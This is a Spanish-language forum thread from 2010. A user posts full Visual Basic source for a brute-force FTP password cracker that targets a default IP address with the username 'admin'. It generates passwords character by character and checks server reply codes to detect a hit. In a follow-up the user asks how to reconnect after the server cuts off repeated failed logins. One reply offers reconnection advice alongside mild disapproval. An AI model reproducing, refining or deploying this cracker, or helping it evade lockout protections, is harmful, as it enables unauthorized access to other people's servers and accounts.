• Jueves 28 de Marzo de 2024, 20:53

Autor Tema:  CRACKER ME LO REVISAN?  (Leído 2140 veces)

79137913

  • Nuevo Miembro
  • *
  • Mensajes: 16
    • Ver Perfil
CRACKER ME LO REVISAN?
« en: Miércoles 28 de Julio de 2010, 16:42 »
0
HOLA!!!
Como andan, quisiera que me revisaran el codigo de un FTP CRACKER por medio de un winSOCK(telnet) que hice recien  :comp: .
El proyecto a mi parecer esta completo, consiste en un proyecto (disculpen la redundancia) con el componente winsock, un form y un modulo bas normal.

Dentro del form hay:
1 textbox multilinea llamado INx
1 texbox normal llamado OUTx
1 winsock llamado TELNET

el codigo del form es este:

Código: Visual Basic
  1.  
  2. Public CT As Integer
  3. Public FAILED As String
  4. Public ACUSER As String
  5. Public USER As String
  6. Public CONTROL As Integer
  7.  
  8. Private Sub Form_Load()
  9.     CONTROL = vbNo
  10.     Telnet.RemoteHost = InputBox("HOST", "INSERTE", "173.236.40.122")
  11.     Telnet.RemotePort = InputBox("PUERTO", "INSERTE", 21)
  12.     FAILED = InputBox("CODIGO DE CONTRASEÑA INVALIDA", "INSERTE", 530)
  13.     ACUSER = InputBox("CODIGO DE USUARIO ACEPTADO", "INSERTE", 331)
  14.     USER = InputBox("USUARIO", "INSERTE", "admin")
  15.     Call BORRAR_VECTOR
  16.     Telnet.Connect
  17. End Sub
  18.  
  19. Private Sub Form_Resize()
  20.     If Me.Height > 701 Then
  21.         inx.Width = Me.Width
  22.         inx.Height = Me.Height - 700
  23.         outx.Width = Me.Width
  24.         outx.Top = inx.Height
  25.     End If
  26. End Sub
  27.  
  28. Private Sub Form_Unload(Cancel As Integer)
  29.     Telnet.Close
  30.     End
  31. End Sub
  32.  
  33. Private Sub telnet_DataArrival(ByVal bytesTotal As Long)
  34.     Dim strData As String
  35.     Telnet.GetData strData
  36.     inx.Text = inx.Text & strData
  37.     If CONTROL = vbNo Then
  38.         Call ANALIZAR(Mid(strData, 1, 3))
  39.     End If
  40.    
  41.     If CT Mod 2 Then
  42.         Call NUEVAPASS
  43.             outx.Text = "pass " & PASS
  44.             Call outx_KeyPress(vbKeyReturn)
  45.         Else
  46.             outx.Text = "user " & USER
  47.             Call outx_KeyPress(vbKeyReturn)
  48.     End If
  49. End Sub
  50.  
  51. Private Sub outx_KeyPress(KeyAscii As Integer)
  52.     If KeyAscii = vbKeyReturn Then
  53.         Telnet.SendData outx.Text & vbCrLf
  54.         outx.Text = ""
  55.         outx.SetFocus
  56.     End If
  57. End Sub
  58.  
  59. Private Sub ANALIZAR(CODE As String)
  60.     CT = CT + 1
  61.     If Not (CODE = ACUSER Or CT = 1 Or CODE = FAILED) Then
  62.         CONTROL = MsgBox("CODIGO EXTRAÑO(" & CODE & ") CON PASSWORD ''" & PASS & "'' DESEA TOMAR EL CONTROL DE LA TERMINAL (SI) O DESEA QUE CONTINUE EL ATAQUE DE FUERZA BRUTA (NO)", vbYesNo)
  63.     End If
  64. End Sub
  65.  
  66.  

Y el codigo del modulo es:
Código: Visual Basic
  1.  
  2. Dim PASSNUM(17) As Integer
  3. Dim PASSLET(17) As String
  4. Public PASS As String
  5.  
  6. Public Sub BORRAR_VECTOR()
  7.     PASSNUM(1) = 47
  8.     For X = 2 To 16
  9.         PASSNUM(X) = 0
  10.     Next X
  11. End Sub
  12.  
  13. Public Sub NUEVAPASS()
  14.     PASSNUM(1) = PASSNUM(1) + 1
  15.     Call ORDENAR
  16.     Call CONVERTIR
  17.     Call CONCATENAR
  18. End Sub
  19.  
  20. Private Sub ORDENAR()
  21.     For X = 1 To 16
  22.         If PASSNUM(X) = 124 Then
  23.             If PASSNUM(X + 1) = 0 Then
  24.                 PASSNUM(X + 1) = 47
  25.             End If
  26.             PASSNUM(X + 1) = PASSNUM(X + 1) + 1
  27.         End If
  28.     Next X
  29.     If PASSNUM(17) = 1 Then
  30.         MsgBox "TODAS LAS CLAVES PROBADAS", , "ERROR"
  31.         End
  32.     End If
  33. End Sub
  34.  
  35. Private Sub CONVERTIR()
  36.     For X = 1 To 16
  37.         If PASSNUM(X) <> 0 Then
  38.             PASSLET(X) = Chr(PASSNUM(X))
  39.         End If
  40.     Next X
  41. End Sub
  42.  
  43. Private Sub CONCATENAR()
  44.     PASS = ""
  45.     For X = 1 To 16
  46.         PASS = PASS & PASSLET(X)
  47.     Next X
  48. End Sub
  49.  
  50.  


Si quieren usar algo del codigo no hay problema, pero igual es muy rudimentario.

El problema principal es que bueno, tardaria mucho pero en fin, es fuerza bruta  :hitcomp:




 :)  :)  :)  :)  :)  GRACIAS DE ANTEMANO  :)  :)  :)  :)  :)

79137913

  • Nuevo Miembro
  • *
  • Mensajes: 16
    • Ver Perfil
Re: CRACKER ME LO REVISAN?
« Respuesta #1 en: Lunes 2 de Agosto de 2010, 20:54 »
0
POR FAVOR, EL PROBLEMA ES QUE EL SERVIDOR SE DESCONECTA EN EL 4 INTENTO INVALIDO, PERO NO ME AVISA, SI AVISARIA, PODRIA HACER LA RECONECCION, PLZZ AYUDA, AUNQUE SEA EL MODERADOR QUE AYUDE.

Thanatos-chan

  • Miembro MUY activo
  • ***
  • Mensajes: 136
  • Nacionalidad: do
    • Ver Perfil
Re: CRACKER ME LO REVISAN?
« Respuesta #2 en: Miércoles 4 de Agosto de 2010, 16:26 »
0
que tal  B)

en mi opinion:

1-el titulo no te ayuda, mas facil hubieras ido a un foro de "hackers", porque si hay alguien que supiera de este tema solo por el titulo, no te va a ayudar.
2-si es un trabajo de universidad, escuela, menudo trabajo ese...  :P , al parecer tu profesor se canso de poner trabajo de recorer la matriz y sumar...pero si es un proyecto personal tuyo...por el titulo y lo que se supone quieres hacer, no todo el mundo es de mente tan abierta para darte una mano.

ya sobre el tema.

te recomiendo, concentres en el objeto tenet, te caeria bien abrir otro tema y esta ves menos hacker... B) .

esta pagina te describe el objeto,

http://msdn.microsoft.com/en-us/library/aa228119%28v=VS.60%29.aspx chequeala.

encontraras la propiedad state junto con el listado de valores.  asi podrias siempre chequear el estado de la conexión antes de usar la rutina.

igualmente. deberias crear una subrutina de conexion y no ponerla solo en el load_form.
Que es un genio???? yo superare a un genio con trabajo duro, y eso es todo.

79137913

  • Nuevo Miembro
  • *
  • Mensajes: 16
    • Ver Perfil
Re: CRACKER ME LO REVISAN?
« Respuesta #3 en: Miércoles 4 de Agosto de 2010, 16:35 »
0
GENIO GRACIAS!!!